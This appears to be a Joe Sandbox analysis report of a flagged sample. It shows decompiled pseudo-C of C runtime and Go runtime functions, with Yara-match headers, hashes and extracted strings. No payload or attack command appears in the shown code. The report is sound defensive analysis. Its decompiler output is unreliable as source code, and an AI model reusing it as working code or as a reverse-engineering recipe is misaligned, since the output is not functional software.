                                                                                                                            				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t53);
                                                                                                                            				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t53 * 8));
                                                                                                                            				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a844d1;
                                                                                                                            				_t16 = E0000025B25BF8A842E4(__edi, _t34, _t45);
                                                                                                                            				"kernel32"();
                                                                                                                            				if (_t16 != 0) goto 0xf8a844c4;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				goto 0xf8a844c6;
                                                                                                                            				if (0 == 0) goto 0xf8a844df;
                                                                                                                            				E0000025B25BF8A7B82C(_t45);
                                                                                                                            				 *_t45 = 0;
                                                                                                                            				E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				0xf8a84408();
                                                                                                                            				goto 0xf8a844fd;
                                                                                                                            				_t20 = E0000025B25BF8A7B89C(_t45);
                                                                                                                            				 *_t45 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t20) | 0xffffffff;
                                                                                                                            			}













                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102446242-0
                                                                                                                            • Opcode ID: 20743d8f56c4e238449b4cf57046a006d5efaa6fd458a657e1fd87a2fed527f8
                                                                                                                            • Instruction ID: 28e5dcb0c4df58a8bc56373edd1716aeaa7961e65a9c5207982a48574a0d189c
                                                                                                                            • Opcode Fuzzy Hash: 20743d8f56c4e238449b4cf57046a006d5efaa6fd458a657e1fd87a2fed527f8
                                                                                                                            • Instruction Fuzzy Hash: 6E218E23601E4086FF176F65BC9C36D6A50EB80773F294128FA1606BD2DBB88842873C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 62%
                                                                                                                            			E0000025B25BF8A78FD4(intOrPtr __esi, signed long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				void* _t18;
                                                                                                                            				void* _t19;
                                                                                                                            				void* _t24;
                                                                                                                            				void* _t27;
                                                                                                                            				signed long long _t29;
                                                                                                                            				signed long long _t38;
                                                                                                                            				void* _t54;
                                                                                                                            				signed long long _t55;
                                                                                                                            
                                                                                                                            				_t29 = __rax;
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rsi;
                                                                                                                            				_a24 = __rdi;
                                                                                                                            				malloc(??);
                                                                                                                            				 *__rax = __rcx;
                                                                                                                            				_t55 = __rax;
                                                                                                                            				malloc(??);
                                                                                                                            				 *((long long*)(__rax + 0x10)) = __rax;
                                                                                                                            				E0000025B25BF8A797B0(0x28, _t24, __esi, _t27, __rax, __rdx, r8d);
                                                                                                                            				 *((intOrPtr*)(_t55 + 8)) = __esi;
                                                                                                                            				malloc(??);
                                                                                                                            				r9d = __esi;
                                                                                                                            				_t38 = _t29;
                                                                                                                            				 *(_t55 + 0x18) = _t29;
                                                                                                                            				E0000025B25BF8A794CC(_t19, 0x100, _t29, _t38, __rdx,  &M0000025B25BF8A8CD10, _t54);
                                                                                                                            				if ( *((char*)(_t29 + (_t38 | 0xffffffff) + 1)) != 0) goto 0xf8a7904b;
                                                                                                                            				 *((intOrPtr*)(_t55 + 0xc)) = 0x100;
                                                                                                                            				_t18 = malloc(??);
                                                                                                                            				 *(_t55 + 0x20) = _t29;
                                                                                                                            				return _t18;
                                                                                                                            			}












                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                                                                            • String ID: lock error
                                                                                                                            • API String ID: 2026495703-4111267675
                                                                                                                            • Opcode ID: 2092c14244dccb223253486cb61779be6fcf792fe870ad61ab41c838604735e8
                                                                                                                            • Instruction ID: e42b99832039a4e28ac0a5c42786820f51031a3fa13bab2373cb62cb694da62e
                                                                                                                            • Opcode Fuzzy Hash: 2092c14244dccb223253486cb61779be6fcf792fe870ad61ab41c838604735e8
                                                                                                                            • Instruction Fuzzy Hash: E201E132600B5141EA45DB12BC0D79D6699F389BE1F28821AFEA943FC6CF3CC0128780
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0131AA40(signed int __eax, signed int __ecx, void* __esp, signed int __rax, unsigned long long __rcx, signed long long __rdi, long long __rsi, long long __rbp, unsigned int __r8, void* __r14, signed int _a8, long long _a16, long long _a24, signed long long _a32, long long _a40, unsigned long long _a48) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				signed int _t73;
                                                                                                                            				void* _t88;
                                                                                                                            				signed int _t97;
                                                                                                                            				signed int _t98;
                                                                                                                            				void* _t105;
                                                                                                                            				signed int _t106;
                                                                                                                            				long long _t139;
                                                                                                                            				unsigned long long _t146;
                                                                                                                            				unsigned long long _t147;
                                                                                                                            				intOrPtr _t148;
                                                                                                                            				void* _t164;
                                                                                                                            				signed long long _t176;
                                                                                                                            				long long _t180;
                                                                                                                            				void* _t181;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t181 = __r14;
                                                                                                                            					_t170 = __r8;
                                                                                                                            					_t159 = __rbp;
                                                                                                                            					_t157 = __rsi;
                                                                                                                            					_t154 = __rdi;
                                                                                                                            					_t142 = __rcx;
                                                                                                                            					_t121 = __rax;
                                                                                                                            					_t107 = __esp;
                                                                                                                            					_t97 = __ecx;
                                                                                                                            					_t73 = __eax;
                                                                                                                            					if(_t164 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L29;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t159 =  &_v8;
                                                                                                                            					if((__rax & 0x00000007) != 0) {
                                                                                                                            						L28:
                                                                                                                            						_t121 = 0x138ce51;
                                                                                                                            						E01330BA0(0x138ce51, _t139, _t159);
                                                                                                                            						goto L29;
                                                                                                                            					}
                                                                                                                            					L2:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_t148 =  *((intOrPtr*)(__rdi + 0x50));
                                                                                                                            					_t170 = __r8 >> 3;
                                                                                                                            					r9d = r9d & 0x00000007;
                                                                                                                            					_t180 = __rcx;
                                                                                                                            					_t144 = __r8;
                                                                                                                            					r12d = 1;
                                                                                                                            					r12d = r12d << __ecx;
                                                                                                                            					_t176 = _t148 + _t170;
                                                                                                                            					if( *0x14cf2f3 != 0) {
                                                                                                                            						L13:
                                                                                                                            						_a40 = __rsi;
                                                                                                                            						_t144 = __rcx;
                                                                                                                            						_t154 = _t176;
                                                                                                                            						_t106 = r12d;
                                                                                                                            						_t170 = __r8;
                                                                                                                            						_t73 = L01312E60(__esp, __rax, __rcx, _t176,  &_v8, __r8, __r14);
                                                                                                                            						__eflags = _t73;
                                                                                                                            						if(_t73 != 0) {
                                                                                                                            							L24:
                                                                                                                            							return _t73;
                                                                                                                            						} else {
                                                                                                                            							L14:
                                                                                                                            							_t121 = _a8;
                                                                                                                            							_t157 = _a40;
                                                                                                                            							goto L15;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						L3:
                                                                                                                            						if( *0x14cf78c <= 0 ||  *((intOrPtr*)(__rdi + 0x30)) > __r8) {
                                                                                                                            							L6:
                                                                                                                            							_t101 =  *(_t170 + _t148) & 0x000000ff;
                                                                                                                            							if((r12b &  *(_t170 + _t148) & 0x000000ff) != 0) {
                                                                                                                            								L12:
                                                                                                                            								return _t73;
                                                                                                                            							} else {
                                                                                                                            								L7:
                                                                                                                            								asm("lock inc ebp");
                                                                                                                            								_t144 =  *((intOrPtr*)(_t154 + 0x18));
                                                                                                                            								_t170 = 0;
                                                                                                                            								_t147 = 0 + _t144 >> 0x2a;
                                                                                                                            								asm("o16 nop [eax+eax]");
                                                                                                                            								if(0 >= 0x40) {
                                                                                                                            									L26:
                                                                                                                            									_t97 = 0x40;
                                                                                                                            									E013588E0();
                                                                                                                            									goto L27;
                                                                                                                            								} else {
                                                                                                                            									L8:
                                                                                                                            									r8d = r8d & 0x000fffff;
                                                                                                                            									_t146 = _t144 >> 0x10;
                                                                                                                            									r9d =  *(0 + _t146 + 0x21040) & 0x000000ff;
                                                                                                                            									_t170 =  *0x800005D6DD68 + _t146 + 0x21040;
                                                                                                                            									_t144 = _t144 >> 0xd;
                                                                                                                            									if((0x00000001 << (_t97 & 0x0000003f) & r9b) == 0) {
                                                                                                                            										asm("lock inc ecx");
                                                                                                                            									}
                                                                                                                            									_t101 =  *(_t154 + 0x62) & 0x000000ff;
                                                                                                                            									if(( *(_t154 + 0x62) & 1) == 0) {
                                                                                                                            										L15:
                                                                                                                            										asm("prefetcht0 [eax]");
                                                                                                                            										_t147 =  *_t157;
                                                                                                                            										__eflags = _t147;
                                                                                                                            										if(_t147 == 0) {
                                                                                                                            											L20:
                                                                                                                            											_t98 = 0;
                                                                                                                            											__eflags = 0;
                                                                                                                            											goto L21;
                                                                                                                            										} else {
                                                                                                                            											L16:
                                                                                                                            											_t154 =  *((intOrPtr*)(_t147 + 0x10));
                                                                                                                            											__eflags = _t154 - 0xfd;
                                                                                                                            											if(__eflags != 0) {
                                                                                                                            												L18:
                                                                                                                            												if(__eflags >= 0) {
                                                                                                                            													L25:
                                                                                                                            													E013588C0();
                                                                                                                            													goto L26;
                                                                                                                            												} else {
                                                                                                                            													L19:
                                                                                                                            													 *(_t147 + 0x18 + _t154 * 8) = _t121;
                                                                                                                            													 *((long long*)(_t147 + 0x10)) =  *((long long*)(_t147 + 0x10)) + 1;
                                                                                                                            													_t98 = 1;
                                                                                                                            													goto L21;
                                                                                                                            												}
                                                                                                                            											} else {
                                                                                                                            												L17:
                                                                                                                            												_t98 = 0;
                                                                                                                            												L21:
                                                                                                                            												__eflags = _t98;
                                                                                                                            												if(_t98 == 0) {
                                                                                                                            													_t73 = L013204C0(_t88, _t101, _t157, _t121, _t154, _t159, _t181);
                                                                                                                            												}
                                                                                                                            												return _t73;
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            									} else {
                                                                                                                            										L11:
                                                                                                                            										 *((long long*)(_t157 + 0x10)) =  *((intOrPtr*)(_t157 + 0x10)) +  *((intOrPtr*)(_t154 + 0x68));
                                                                                                                            										return _t73;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						} else {
                                                                                                                            							L5:
                                                                                                                            							r10d =  *( *((intOrPtr*)(__rdi + 0x48)) + _t170) & 0x000000ff;
                                                                                                                            							if((r10b & r12b) == 0) {
                                                                                                                            								L27:
                                                                                                                            								_v16 = _t180;
                                                                                                                            								_v24 = _t139;
                                                                                                                            								E01332340(_t147, _t159, _t181);
                                                                                                                            								E01332C40(_t97, _t105, _t106, _t107, 0x138be39, _t139, _t159, _t181);
                                                                                                                            								L01332AA0(_t101, _t105, _t107, _a8, _t144, _t159, _t181);
                                                                                                                            								E01332C40(_t97, _t105, _t106, _t107, 0x1387a58, _t139, _t159, _t181);
                                                                                                                            								L01332AA0(_t101, _t105, _t107, _v24, _t144, _t159, _t181);
                                                                                                                            								E01332C40(_t97, _t105, _t106, _t107,  &M0138678B, _t139, _t159, _t181);
                                                                                                                            								L01332AA0(_t101, _t105, _t107, _v16, _t144, _t159, _t181);
                                                                                                                            								E01332C40(_t97, _t105, _t106, _t107, 0x13867b1, _t139, _t159, _t181);
                                                                                                                            								L013323C0(_t147, _t159, _t181);
                                                                                                                            								L0131AD60(_t106, 0x13869cf, _t139, _v24, _v16, _t159, _t181);
                                                                                                                            								_t142 = _a8;
                                                                                                                            								_t154 = 0xffffffff;
                                                                                                                            								L0131AD60(_t106, 0x1386914, _t139, _t142, 0xffffffff, _t159, _t181);
                                                                                                                            								 *((char*)( *((intOrPtr*)(_t181 + 0x30)) + 0xf9)) = 2;
                                                                                                                            								E01330BA0(0x1389468, _t139, _t159);
                                                                                                                            								goto L28;
                                                                                                                            							} else {
                                                                                                                            								goto L6;
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L30:
                                                                                                                            					L29:
                                                                                                                            					_a8 = _t121;
                                                                                                                            					_a16 = _t139;
                                                                                                                            					_a24 = _t142;
                                                                                                                            					_a32 = _t154;
                                                                                                                            					_a40 = _t157;
                                                                                                                            					_a48 = _t170;
                                                                                                                            					E01356200(_t147, _t159);
                                                                                                                            				}
                                                                                                                            			}




















                                                                                                                            0x0131aade
                                                                                                                            0x0131aaf0
                                                                                                                            0x0131aaf3
                                                                                                                            0x0131aaf7
                                                                                                                            0x0131ab04
                                                                                                                            0x0131ac14
                                                                                                                            0x0131ac17
                                                                                                                            0x0131ac20
                                                                                                                            0x00000000
                                                                                                                            0x0131ab0a
                                                                                                                            0x0131ab0a
                                                                                                                            0x0131ab19
                                                                                                                            0x0131ab2c
                                                                                                                            0x0131ab33
                                                                                                                            0x0131ab40
                                                                                                                            0x0131ab4e
                                                                                                                            0x0131ab5b
                                                                                                                            0x0131ab5d
                                                                                                                            0x0131ab5d
                                                                                                                            0x0131ab61
                                                                                                                            0x0131ab68
                                                                                                                            0x0131abb3
                                                                                                                            0x0131abb3
                                                                                                                            0x0131abb6
                                                                                                                            0x0131abb9
                                                                                                                            0x0131abbc
                                                                                                                            0x0131abe2
                                                                                                                            0x0131abe2
                                                                                                                            0x0131abe2
                                                                                                                            0x00000000
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abc2
                                                                                                                            0x0131abc9
                                                                                                                            0x0131abcf
                                                                                                                            0x0131abcf
                                                                                                                            0x0131ac07
                                                                                                                            0x0131ac0f
                                                                                                                            0x00000000
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd6
                                                                                                                            0x0131abda
                                                                                                                            0x00000000
                                                                                                                            0x0131abda
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abe4
                                                                                                                            0x0131abe4
                                                                                                                            0x0131abe6
                                                                                                                            0x0131abee
                                                                                                                            0x0131abee
                                                                                                                            0x0131abfc
                                                                                                                            0x0131abfc
                                                                                                                            0x0131abc9
                                                                                                                            0x0131ab6a
                                                                                                                            0x0131ab6a
                                                                                                                            0x0131ab72
                                                                                                                            0x0131ab80
                                                                                                                            0x0131ab80
                                                                                                                            0x0131ab68
                                                                                                                            0x0131ab04
                                                                                                                            0x0131aab5
                                                                                                                            0x0131aab5
                                                                                                                            0x0131aab9
                                                                                                                            0x0131aac3
                                                                                                                            0x0131ac25
                                                                                                                            0x0131ac25
                                                                                                                            0x0131ac2a
                                                                                                                            0x0131ac2f
                                                                                                                            0x0131ac40
                                                                                                                            0x0131ac4a
                                                                                                                            0x0131ac60
                                                                                                                            0x0131ac6a
                                                                                                                            0x0131ac80
                                                                                                                            0x0131ac8a
                                                                                                                            0x0131aca0
                                                                                                                            0x0131aca5
                                                                                                                            0x0131acc0
                                                                                                                            0x0131acd1
                                                                                                                            0x0131acd6
                                                                                                                            0x0131ace0
                                                                                                                            0x0131ace9
                                                                                                                            0x0131ad00
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131aac3
                                                                                                                            0x0131aaad
                                                                                                                            0x00000000
                                                                                                                            0x0131ad17
                                                                                                                            0x0131ad17
                                                                                                                            0x0131ad1c
                                                                                                                            0x0131ad21
                                                                                                                            0x0131ad26
                                                                                                                            0x0131ad2b
                                                                                                                            0x0131ad30
                                                                                                                            0x0131ad35
                                                                                                                            0x0131ad53

                                                                                                                            Strings
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0131AC6F
                                                                                                                            • runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foundtoo many open files in syste, xrefs: 0131AC34
                                                                                                                            • marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 s, xrefs: 0131ACF0
                                                                                                                            • greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: create, xrefs: 0131AD05
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0131AC8F
                                                                                                                            • found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengt, xrefs: 0131AC4F
                                                                                                                            • basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimb, xrefs: 0131ACAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-3436063708
                                                                                                                            • Opcode ID: 8a1d3214de8a8e87167d236f63d6a23126ad5619931379a3909adb8435b4c374
                                                                                                                            • Instruction ID: 90d7b0ce9ab2b8ebce0de3e44dbfbceb83cfedc2de30e9dd4e8bdeba9ec865d9
                                                                                                                            • Opcode Fuzzy Hash: 8a1d3214de8a8e87167d236f63d6a23126ad5619931379a3909adb8435b4c374
                                                                                                                            • Instruction Fuzzy Hash: 1F71CEB2615BC087DB089B19E44039ABB65F795B98F845522EF8E03B69CF3CC554C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4095668141-0
                                                                                                                            • Opcode ID: f0fbca43124e56be12df08e0cd312879f0442a09289fe575c61c557e2b503b29
                                                                                                                            • Instruction ID: 0c36a390a5b570bb56ac1624505e6e709889eccf60392e68518d0a26f0e710a5
                                                                                                                            • Opcode Fuzzy Hash: f0fbca43124e56be12df08e0cd312879f0442a09289fe575c61c557e2b503b29
                                                                                                                            • Instruction Fuzzy Hash: 6D510631618F094FEF5A9B689C497B973D0FB49321F60012DF84AC3697EB30E85286D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E01351840(intOrPtr __ebx, void* __edx, void* __edi, void* __esp, long long __rax, void* __rdi, void* __rsi, long long __rbp, void* __r8, void* __r14, long long _a8, intOrPtr _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				void* _t43;
                                                                                                                            				void* _t46;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t76;
                                                                                                                            				intOrPtr _t77;
                                                                                                                            				void* _t91;
                                                                                                                            				void* _t92;
                                                                                                                            				void* _t94;
                                                                                                                            				long long _t104;
                                                                                                                            				long long _t115;
                                                                                                                            				long long _t132;
                                                                                                                            				long long _t133;
                                                                                                                            				intOrPtr _t134;
                                                                                                                            				long long _t135;
                                                                                                                            				void* _t137;
                                                                                                                            				void* _t138;
                                                                                                                            				void* _t145;
                                                                                                                            				void* _t151;
                                                                                                                            				void* _t152;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t152 = __r14;
                                                                                                                            					_t151 = __r8;
                                                                                                                            					_t140 = __rbp;
                                                                                                                            					_t138 = __rsi;
                                                                                                                            					_t137 = __rdi;
                                                                                                                            					_t104 = __rax;
                                                                                                                            					_t94 = __esp;
                                                                                                                            					_t92 = __edi;
                                                                                                                            					_t91 = __edx;
                                                                                                                            					_t77 = __ebx;
                                                                                                                            					if(_t145 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L23;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t140 =  &_v8;
                                                                                                                            					if(__ebx == 0 || __ebx == 0xffffffff) {
                                                                                                                            						L4:
                                                                                                                            						return 0;
                                                                                                                            					} else {
                                                                                                                            						L3:
                                                                                                                            						_t132 = 0x146a760;
                                                                                                                            						L6:
                                                                                                                            						while(_t132 != 0) {
                                                                                                                            							if( *((intOrPtr*)(_t132 + 0x118)) > _t104 ||  *((intOrPtr*)(_t132 + 0x120)) <= _t104) {
                                                                                                                            								L5:
                                                                                                                            								_t132 =  *((intOrPtr*)(_t132 + 0x220));
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							L11:
                                                                                                                            							_a16 = _t77;
                                                                                                                            							if(_t132 == 0) {
                                                                                                                            								L16:
                                                                                                                            								_v56 = _t104;
                                                                                                                            								_t46 = E01309600(0x147b660, _t135, _t140, _t152);
                                                                                                                            								_t131 =  *0x147b670; // 0x0
                                                                                                                            								_t90 = _a16;
                                                                                                                            								L0130D720(_t46, _a16, 0x137afc0, _t131, _t137, _t138, _t140, _t151, _t152);
                                                                                                                            								_t133 =  *0x137afc0;
                                                                                                                            								_v32 = _t133;
                                                                                                                            								_t48 = E01309820(0x147b660, _t140, _t152);
                                                                                                                            								if(_v32 != 0) {
                                                                                                                            									L18:
                                                                                                                            									return _t48;
                                                                                                                            								} else {
                                                                                                                            									L17:
                                                                                                                            									E01332340(_t135, _t140, _t152);
                                                                                                                            									E01332C40(_t90, _t92, _t93, _t94, 0x1388ca7, _t131, _t140, _t152);
                                                                                                                            									L01332AA0(_t91, _t92, _t94, _a16, _t133, _t140, _t152);
                                                                                                                            									E01332C40(_t90, _t92, _t93, _t94, 0x1386ba5, _t131, _t140, _t152);
                                                                                                                            									L01332AA0(_t91, _t92, _t94, _v56, _t133, _t140, _t152);
                                                                                                                            									E01332C40(_t90, _t92, _t93, _t94, 0x1388680, _t131, _t140, _t152);
                                                                                                                            									L013323C0(_t135, _t140, _t152);
                                                                                                                            									_t115 = 0x146a760;
                                                                                                                            									L20:
                                                                                                                            									while(_t115 != 0) {
                                                                                                                            										_v24 = _t115;
                                                                                                                            										_t133 =  *((intOrPtr*)(_t115 + 0x118));
                                                                                                                            										_v40 = _t133;
                                                                                                                            										_t135 =  *((intOrPtr*)(_t115 + 0x120));
                                                                                                                            										_v48 = _t135;
                                                                                                                            										E01332340(_t135, _t140, _t152);
                                                                                                                            										E01332C40(_t90, _t92, _t93, _t94, 0x1386ea8, _t131, _t140, _t152);
                                                                                                                            										L01332AA0(_t91, _t92, _t94, _v40, _t133, _t140, _t152);
                                                                                                                            										E01332C40(_t90, _t92, _t93, _t94, 0x1386f35, _t131, _t140, _t152);
                                                                                                                            										L01332AA0(_t91, _t92, _t94, _v48, _t133, _t140, _t152);
                                                                                                                            										E013325A0(_t90, _t91, _t92, _t93, _t94, _t140, _t152);
                                                                                                                            										L013323C0(_t135, _t140, _t152);
                                                                                                                            										_t115 =  *((intOrPtr*)(_v24 + 0x220));
                                                                                                                            									}
                                                                                                                            									E01330BA0(0x138e2d0, _t131, _t140);
                                                                                                                            									goto L22;
                                                                                                                            								}
                                                                                                                            							} else {
                                                                                                                            								L12:
                                                                                                                            								_v16 = _t132;
                                                                                                                            								_t93 = _t77;
                                                                                                                            								_t131 =  *((intOrPtr*)(_t132 + 0x210));
                                                                                                                            								_t90 = _t77;
                                                                                                                            								_t76 = L0130D720(_t43, _t77, 0x137b080,  *((intOrPtr*)(_t132 + 0x210)), _t137, _t138, _t140, _t151, _t152);
                                                                                                                            								if( *0x137b080 != 0) {
                                                                                                                            									L15:
                                                                                                                            									return _t76;
                                                                                                                            								} else {
                                                                                                                            									L13:
                                                                                                                            									_t134 = _v16;
                                                                                                                            									_t135 =  *((intOrPtr*)(_t134 + 0x118));
                                                                                                                            									_t133 =  *((intOrPtr*)(_t134 + 0x120));
                                                                                                                            									if(_t133 < _t135 + _a16) {
                                                                                                                            										L22:
                                                                                                                            										_v40 = _t135;
                                                                                                                            										_v48 = _t133;
                                                                                                                            										E01332340(_t135, _t140, _t152);
                                                                                                                            										E01332C40(_t90, _t92, _t93, _t94, 0x1388ca7, _t131, _t140, _t152);
                                                                                                                            										L01332AA0(_t91, _t92, _t94, _a16, _t133, _t140, _t152);
                                                                                                                            										E01332C40(_t90, _t92, _t93, _t94, 0x13880ac, _t131, _t140, _t152);
                                                                                                                            										L01332AA0(_t91, _t92, _t94, _v40, _t133, _t140, _t152);
                                                                                                                            										E01332C40(_t90, _t92, _t93, _t94, 0x138681e, _t131, _t140, _t152);
                                                                                                                            										L01332AA0(_t91, _t92, _t94, _v48, _t133, _t140, _t152);
                                                                                                                            										E013325A0(_t90, _t91, _t92, _t93, _t94, _t140, _t152);
                                                                                                                            										L013323C0(_t135, _t140, _t152);
                                                                                                                            										_t104 = 0x138cb02;
                                                                                                                            										_t77 = 0x21;
                                                                                                                            										E01330BA0(0x138cb02, _t131, _t140);
                                                                                                                            										goto L23;
                                                                                                                            									} else {
                                                                                                                            										L14:
                                                                                                                            										return _t76;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							goto L24;
                                                                                                                            						}
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					L24:
                                                                                                                            					L23:
                                                                                                                            					_a8 = _t104;
                                                                                                                            					_a16 = _t77;
                                                                                                                            					E01356200(_t135, _t140);
                                                                                                                            				}
                                                                                                                            			}





























                                                                                                                            0x01351aa0
                                                                                                                            0x01351aaa
                                                                                                                            0x01351aaf
                                                                                                                            0x01351ab4
                                                                                                                            0x01351ab9
                                                                                                                            0x01351ac0
                                                                                                                            0x01351ac5
                                                                                                                            0x00000000
                                                                                                                            0x013518f4
                                                                                                                            0x013518f4
                                                                                                                            0x013518fd
                                                                                                                            0x013518fd
                                                                                                                            0x013518ee
                                                                                                                            0x013518cb
                                                                                                                            0x00000000
                                                                                                                            0x013518a3
                                                                                                                            0x00000000
                                                                                                                            0x0135189a
                                                                                                                            0x00000000
                                                                                                                            0x01351acb
                                                                                                                            0x01351acb
                                                                                                                            0x01351ad0
                                                                                                                            0x01351ad4
                                                                                                                            0x01351ade

                                                                                                                            Strings
                                                                                                                            • runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesP has cached GC work at end of, xrefs: 01351A30
                                                                                                                            • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe, xrefs: 01351976
                                                                                                                            • out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker initGetConsoleModeGetProcAddressGetUserNameExWMB; allocated NetUserGetInfoOther_ID_StartPattern_, xrefs: 01351A71
